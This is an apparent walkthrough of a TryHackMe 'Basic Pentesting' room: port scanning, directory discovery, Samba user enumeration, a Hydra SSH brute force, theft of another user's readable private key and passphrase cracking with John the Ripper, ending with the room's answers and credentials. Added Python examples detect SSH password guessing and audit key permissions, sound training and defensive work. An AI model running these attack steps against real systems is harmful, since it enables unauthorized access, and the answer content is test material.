Basic Pentesting

Task 1. Web App Testing and Privilege Escalation

Question 1. 

Deploy the machine and connect to our network

Start the machine and connect to the THM network using OpenVPN or the AttackBox.

Question 2.

Find the services exposed by the machine 

Nmap

# nmap -p- -A 10.10.204.61


Output

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7


Found 6 ports open.

Question 3. 

What is the name of the hidden directory on the web server (enter name without /)?

For this we are going to use gobuster with the dirbuster directory-list-2.3-medium wordlist.

Gobuster

# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The scan returned 2 directories.


Output

/development          (Status: 301) [Size: 316] [--> http://10.10.20.44/development/]

/server-status        (Status: 403) [Size: 299]   


Answer 3.

/development

Question 4. 

User brute-forcing to find the username & password

We could use hydra with username/password lists to try to brute-force the credentials, but since the Samba ports are exposed we will enumerate the Samba shares and users first, using a tool called enum4linux.

Note

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.

enum4linux

# enum4linux -U -a 10.10.204.61


Output

Share Enumeration on 10.10.204.61   

Anonymous       Disk      

IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)


Found 2 usernames and 2 shares. 

Question 5. 

What is the username? 

Answer 5.

jan

Question 6.  

What is the password? 

OK, since we have a username and port 22 (SSH) is exposed, we can try brute-forcing the password using Hydra in combination with the rockyou wordlist.

Note

Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. 

Hydra

# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh                                                 


Output

[22][ssh] host: 10.10.204.61   login: jan   password: armando

1 of 1 target successfully completed, 1 valid password found


Success, Hydra found the password 

Answer 6. armando
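
Seen from the server side, the Hydra run above leaves a burst of failed SSH logins for one account followed by a success. The following is an added example, not part of the original walkthrough, that flags this pattern in sshd auth log lines; the log lines, host name, source addresses and the threshold of 5 are constructed assumptions.

```python
import re
from collections import defaultdict

# Matches OpenSSH "Failed/Accepted password" messages as written to auth.log.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_password_guessing(log_text, threshold=5):
    """Flag (source, user) pairs with >= threshold consecutive failed logins.

    'breached' is True when a successful login follows the flagged failures.
    """
    failures = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["src"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                entry = findings.setdefault(key, {"breached": False})
                entry["failures"] = failures[key]
        elif key in findings:
            findings[key]["breached"] = True  # guessing ended in a login
        else:
            failures[key] = 0  # a few typos followed by a login: reset

    return findings

def make_line(sec, result, user, src):
    return (f"Sep  7 14:20:{sec:02d} web01 sshd[2101]: {result} password "
            f"for {user} from {src} port 40{sec:03d} ssh2")

# Constructed sample log (documentation addresses, not taken from the page).
SAMPLE_LOG = "\n".join(
    [make_line(s, "Failed", "jan", "192.0.2.10") for s in range(6)]
    + [make_line(6, "Accepted", "jan", "192.0.2.10")]
    + [make_line(s, "Failed", "kay", "198.51.100.7") for s in (10, 11)]
    + [make_line(12, "Accepted", "kay", "198.51.100.7")]
    + [make_line(s, "Failed", "invalid user admin", "192.0.2.10")
       for s in range(20, 25)]
)

if __name__ == "__main__":
    for (src, user), info in detect_password_guessing(SAMPLE_LOG).items():
        print(src, user, info)
```

A finding with breached set to True is the case that needs a password reset and a review of the session, not just a block of the source address.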

Question 7.  What service do you use to access the server (answer in abbreviation in all caps)?

From our initial nmap scan we know that port 22 (SSH) is open, so we will connect to the server over Secure Shell with username jan and password armando.

# ssh jan@10.10.204.61

Enter the password and we are in.

Answer 7.

SSH

Question 8.

Enumerate the machine to find any vectors for privilege escalation 

Now that we have access to the server with jan’s account, we can automate this process with the linpeas script, which is part of the PEASS-ng repository (https://github.com/carlospolop/PEASS-ng).

Note

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz.

So let’s get the script and copy it over to the server using jan’s credentials.

# git clone https://github.com/carlospolop/PEASS-ng.git

Navigate to the directory containing linpeas.sh (PEASS-ng/linPEAS/linpeas.sh).

# scp linpeas.sh jan@10.10.204.61:/tmp

Once the transfer is complete, run the script. This takes some time so be patient.

The script returned a lot of interesting files, but the most valuable of all are Kay’s private SSH keys.

Question 9.

What is the name of the other user you found (all lower case)?

We got that from question 4 (enum4linux).

Answer 9.

Kay 

Question 10.

If you have found another user, what can you do with this information?

From the linpeas output we can see that Kay’s SSH private key is readable by other users, so we will use it to log in over SSH as Kay and see if we can find the final password.

The location of the private key is 

/home/kay/.ssh/
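
The finding above comes down to file permissions: a private key under a user's .ssh directory that other local accounts can read. The following is an added example, not part of the original walkthrough, that audits home directories for such keys and can tighten them to 0600 (key) and 0700 (.ssh directory); the sample tree and its placeholder key contents are constructed.

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_ssh_keys(home_root="/home", fix=False):
    """List private keys under <home_root>/*/.ssh readable by group or others.

    With fix=True, tighten each finding to 0600 (key) and 0700 (.ssh dir).
    """
    exposed = []
    for ssh_dir in sorted(Path(home_root).glob("*/.ssh")):
        try:
            entries = sorted(p for p in ssh_dir.iterdir() if p.is_file())
        except OSError:
            continue  # directory not listable by the auditing account
        for path in entries:
            try:
                with open(path, "rb") as fh:
                    head = fh.read(64)
            except OSError:
                continue  # file not readable by the auditing account
            if b"PRIVATE KEY-----" not in head:
                continue  # public keys, known_hosts, authorized_keys, ...
            mode = stat.S_IMODE(path.stat().st_mode)
            if mode & 0o077:
                exposed.append((str(path), oct(mode)))
                if fix:
                    os.chmod(path, 0o600)
                    os.chmod(ssh_dir, 0o700)
    return exposed

def build_sample_tree():
    """Constructed layout: kay's key is world-readable, jan's is 0600."""
    root = Path(tempfile.mkdtemp())
    for user, mode in (("kay", 0o644), ("jan", 0o600)):
        ssh_dir = root / user / ".ssh"
        ssh_dir.mkdir(parents=True)
        key = ssh_dir / "id_rsa"
        key.write_text("-----BEGIN RSA PRIVATE KEY-----\n(placeholder)\n")
        os.chmod(key, mode)
        (ssh_dir / "id_rsa.pub").write_text("ssh-rsa AAAA(placeholder) user\n")
    return root

if __name__ == "__main__":
    sample = build_sample_tree()
    print(audit_ssh_keys(sample, fix=True))  # kay's key reported and tightened
    print(audit_ssh_keys(sample))            # nothing left to report
```

Run it as root against /home so that keys in directories the auditing account cannot list are not silently skipped.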

Question 11.  

What is the final password you obtain?

OK, so in order to log in with Kay’s private key you need to provide a passphrase (which we don’t know), since his key is passphrase-protected. Let’s store the key in a file for now.

$ cat /home/kay/.ssh/id_rsa

The file that will hold the key on my local machine:

# nano /tmp/id_kay

Copy and paste the output into that file on your local PC.

Since we already have the private key, we can try to recover its passphrase using the John the Ripper suite.

Note

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. 

ssh2john is part of the John the Ripper suite. It is a script that transforms an SSH private key (RSA/DSA/EC/OPENSSH) into John’s format for later cracking with JtR.

ssh2john

# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay

johntheripper

# john /tmp/s2j_kay --wordlist=/usr/share/wordlists/rockyou.txt


Output

Will run 8 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press 'q' or Ctrl-C to abort, almost any other key for status

beeswax          (/tmp/kay_id)

Warning: Only 2 candidates left, minimum 8 needed for performance.

1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/s a6_123..*7¡Vamos!

Session completed


Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.

SSH

# ssh -i /tmp/id_kay kay@10.10.204.61

Enter the passphrase and we are in. Now let’s have a look at the pass.bak file.

$ cat pass.bak


Output

heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Answer 11. 

heresareallystrongpasswordthatfollowsthepasswordpolicy$$